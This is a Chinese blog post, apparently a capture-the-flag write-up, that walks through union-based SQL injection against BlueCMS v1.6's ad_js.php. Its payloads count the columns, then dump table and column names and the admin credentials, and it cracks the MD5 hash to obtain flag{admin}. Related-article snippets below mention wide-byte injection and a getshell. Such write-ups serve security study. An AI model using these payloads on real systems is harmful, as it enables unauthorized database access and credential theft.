BlueCMS_V1.6 ad_js.php页面存在SQL注入

最新推荐文章于 2024-07-20 23:54:17 发布
最新推荐文章于 2024-07-20 23:54:17 发布
阅读量306 收藏 3
点赞数 1
分类专栏: # SQL注入 web安全 文章标签: javascript php sql 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53303754/article/details/133842295
版权

BlueCMS_V1.6 ad_js.php页面存在SQL注入

1、已知ad_js.php页面存在SQL注入,验证一下,输入如下payload:

http://ip/ad_js.php?ad_id=1
在这里插入图片描述

单引号果然报错

2、使用order by查看有多少字段,

先输入payload:

http://ip/ad_js.php?ad_id=1 order by 7

order by 7没有报错
在这里插入图片描述

再试一下order by 8,输入:

http://ip/ad_js.php?ad_id=1 order by 8
在这里插入图片描述

order by 8报错,所以字段数为7

3、现在要知道回显位置,输入如下payload:

http://ip/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,7

这时会看到一个空白页面
在这里插入图片描述

右键点击,查看网页源代码

在这里插入图片描述

发现第7个字段有回显

4、查看当前数据库名,输入如下payload:

http://ip/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,database()

返回还是空白网页,需查看源码

在这里插入图片描述

得到数据库名为“blue”

5、爆表名,输入如下payload:

http://ip/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database()

继续查看网页源代码
在这里插入图片描述

发现有如下这些表:

blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user

接下来选择爆blue_admin这个表

6、爆列名,这里需要将表名转换为16进制,可通过如下网址转换:

https://www.sojson.com/hexadecimal.html

且16进制再输入是要再前面加上“0x”,输入如下payload:

http://ip/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,GROUP_CONCAT(column_name) from information_schema.columns where table_name=0x626c75655f61646d696e

执行后继续查看网页源代码
在这里插入图片描述

发现有以下几个列

admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip

7、获取admin的密码,输入如下payload:

http://ip/ad_js.php?ad_id=1 union select 1,2,3,4,5,6,GROUP_CONCAT(admin_name,0x3a,pwd) FROM blue_admin

执行后继续查看网页源代码

在这里插入图片描述

得到密码的md5值

21232f297a57a5a743894a0e4a801fc3

8、md5解密,可使用如下网站:

https://www.cmd5.com/

得到admin的密码为admin,把它用flag括起来就得到flag:

flag{admin}

Mamba-
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
代码审计之bluecms——sql注入
willow_liang的博客
10-28 797
bluecmsv1.6 php5.3+apache 1.漏洞注入点分析 1.找输入点,全局搜索接收参数的地方 2.找数据库语句定义,查看是否拼接了可控变量 3.根据源码挖注入 2.用phpstorm进行跟踪ad_js.php文件,burpsuite抓包进行sql注入测试 3.用phpstorm进行调试,跳到table函数,进行对数据表加blue前缀,和表的名称 function table($table) { global $pre; return $pre .$table ; 4.定位到函数ge
bluecms_v1.6_sp1.zip
01-25
"bluecms_v1.6_sp1.zip" 是一个软件压缩包,主要包含了一个名为 "bluecms_v1.6_sp1" 的更新版本。这个版本可能是针对 "BlueCMS" 系统的一个更新,版本号为 1.6 Service Pack 1(SP1),通常SP代表着一个重要的补丁或...
2、Bluecms代码审计
Yzz_的博客
03-04 572
【代码】2、Bluecms代码审计。
php代码审计篇bluecms代码审计
qq_47289634的博客
09-22 288
加上pyload中的%df 后,就是 %df%5c%27 ,然后MySQL在使用GBK编码的时候,会认为两个字符为一个汉字, %df%5c就被解析为一个汉字,%27也就是单引号就成功逃逸了,成功实现闭合,后面就可以通过or 来执行语句了。继续跟进,看下values这些值里面有没有进行过滤,看到使用intval进行了转换,其他也都进行了防护,重点回到getip吧。可以看到本机ip也在里面,而client-ip是可以伪造的,上bp,评论,抓包,加个client-ip参数,发现可以修改。查看执行的sql语句。
BlueCMS v1.6 代码审计之SQL注入
good good study
08-23 4641
目录 sql注入1 sql注入2 hackbar提交post数据 最近开始入坑代码审计,而最好的学习方式就是模仿,站在前人的肩膀上,能让我们更加快速的成长。 blueCMS是一款小众的CMS,网上也有人发布其相关漏洞。接下来对已公布的漏洞进行源码分析 环境准备 BlueCMS v1.6 phpstudy 2018 php5.5.35 phpstorm sql注入1 首先查看配置文件,发现网站有统一的过滤方法,在文件common.inc.php中,对$_post、$_get、$_co
ad_js.php getshell,Dedecms 后台getshell
weixin_36476695的博客
03-18 232
原文链接:传送门虽然是复现文章,不过会更详细地来阐释这个漏洞,,因为现在后台getshell花样层出不穷,因此想要复现一波来学习一波getshell姿势~因为是最新的dedecms版本,因此我们直接在织梦官网上下载即可~http://www.dedecms.com/products/dedecms/downloads/DedeCMS V5.7 SP2正式版发布日期: 2017-04-05这里我测试...
ad_js.php sql,BlueCMS审计学习笔记
weixin_36397104的博客
03-10 269
原标题:BlueCMS审计学习笔记这篇只能算是学习笔记,因为bluecms是我第一次审计的CMS,所以参考了不少前辈们的经验。参考文章于文末给出。算是一个记录了我的学习心得,学习的过程的文章。一.实践总结:1.可以按照功能点审计,比如评论处是否支持匿名,有没有获取ip处存在sql注入(X-FORWARD-FOR),头像处能否上传图片马;2.文件包含漏洞除了可以爆关键文件外,也可以和其它漏洞结合(比...
PHP地方门户系统-BlueCMS v1.6 sp1.rar
07-07
bluecms v1.6 升级到 bluecms v1.6 sp1版说明: 解决问题: 1.修正所有已知错误 2.前后台整合通用编辑器fckeditor,替换之前的editor 3.增加前台发布新闻过滤 4.增加禁止词语过滤 5.增加同一用户注册时间间隔...
Bluecms内容管理系统 v1.6sp1
03-19
(一)运行环境需求: 可用的httpd服务器(如Apache、Zeus、IIS等) PHP4.3.0及以上 ...v1.6演示地址:http://www.bluecms.net/demo 官方网站:http://www.bluecms.net/ 官方论坛:htpp://www.bluecms.net/bbs
bluecms-zzcms.rar
06-09
"bluecms-zzcms.rar"这个压缩包包含两个流行的开源内容管理系统(CMS)——BlueCMS v1.6 sp1和ZZCMS 8.2的源代码,这两个系统被广泛用于搭建网站,同时也被用作初学者进行代码审计的实例。 **BlueCMS v1.6 sp1** ...
BlueCMS地方分类信息门户 1.6.zip
05-27
BlueCMS地方分类信息门户 1.6 升级改进: 1、修改所有已知错误 2、重新设计系统模板 3、增加会员前台发布新闻、编辑新闻、管理新闻功能 4、增加新闻审核功能 5、增加会员充值功能、预设支付宝和银行汇款 6、...
dedecms ad_js.php,广告管理
weixin_36084095的博客
03-10 152
广告管理是dedecms网站中比较常用的一个模块,为网站盈利提供方便。广告管理的安装、卸载等方法已经在模块管理中有所介绍。1.广告管理包含的文件:/dede/ad_main.php后台管理主页面/dede/ad_add.php后台广告添加页面/dede/ad_edit.php后台广告编辑页面/dede/templets/ad_add.htm后台广告添加页面模板/dede/templets/...
dedecms ad_js.php,织梦dedecms dede plus文件作用介绍及安全设置
weixin_36054213的博客
03-10 486
一、安装设置1、默认的后台模块中心有很多模块。这里除了"友情链接"模块其他都可以删掉。在后台可以先卸载再删除。2、如果是一开始就不想要的话,安装版plus目录下进行如下操作。删除:guestbook文件夹【留言板,后面我们安装更合适的留言本插件】;删除:task文件夹和task.php【计划任务控制文件】删除:ad_js.php【广告】删除:bookfeedback.php和bookfeedbac...
ad_js.php漏洞防护,BlueCMS v1.6 sp1 adjs.php SQL注入漏洞分析脚本安全 -电脑资料
weixin_42536058的博客
04-13 307
官方简介:www.bluecms.netBlueCMS(地方分类信息门户专用CMS系统)基于当今最流行的开源组合PHP+MYSQL开发每个分类均可单独设置Title、Keywords、Description,方便SEO强力模板引擎,显示风格自由定义,随心所欲多功能模块插件,操作简单方便智能缓存技术,提高网站性能多属性模型自定义,栏目功能强大缺陷文件:ad_js.php漏洞成因:12: $ad_id...
ad_js.php漏洞防护,BlueCMS v1.6 sp1 ad_js.php SQL注入漏洞分析
weixin_39674293的博客
04-13 191
BlueCMS(地方分类信息门户专用CMS系统)基于当今最流行的开源组合PHP+MYSQL开发每个分类均可单独设置Title、Keywords、Description,方便SEO强力模板引擎,显示风格自由定义,随心所欲多功能模块插件,操作简单方便智能缓存技术,提高网站性能多属性模型自定义,栏目功能强大缺陷文件:ad_js.php漏洞成因:12: $ad_id = !empty($_GET['ad_...
ad js.php aid,应急响应实例分享
weixin_39862847的博客
03-11 519
1.事件简述某天,发现网站被百度提示页面部分已被非法篡改。通过查看百度快照,发现网站首页确实被篡改,插入内容被编码,解码内容如下从上可确认,网站确实存在页面篡改情况。2.排查过程本次的排查过程还是很有趣的,中间还是有好多雷点,首先登录网站管理后台,发现网站首页篡改时间为10月6号。通过对日志进行分析发现攻击者通过test.php写入optimized.php后门,写入时间为06/Oct/2019:...
bluecms_v_1.6sp1代码审计
RestoreJustice的博客
03-23 780
这是一个比较古老的cms,可以说是满目疮痍,更靶场一样。上述漏洞主要是前台的。后台同样存在类似或者没有写到的漏洞。由于自己技术有限,就到这。
Next.js静态导出与动态路由优化
最新发布
天涯学馆
07-20 802
Next.js 是一个流行的 React 框架,它简化了构建服务端渲染(SSR)和静态站点生成(SSG)的应用。静态导出是Next.js的一项强大特性,它允许你将整个应用程序导出为静态文件,从而在无服务器环境下运行,提高加载速度和降低服务器成本。动态路由则允许你根据数据生成页面,即使在静态导出的情况下也能保持灵活性。
bluecms sql注入
11-02
BlueCMS v1.6存在SQL注入漏洞,攻击者可以通过构造恶意的SQL语句来获取敏感信息或者执行非法操作。攻击者可以通过爆出blue_admin中的字段名来获取更多的信息。具体方法是通过访问`/bluecms_1.6/uploads/ad_js.php?...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值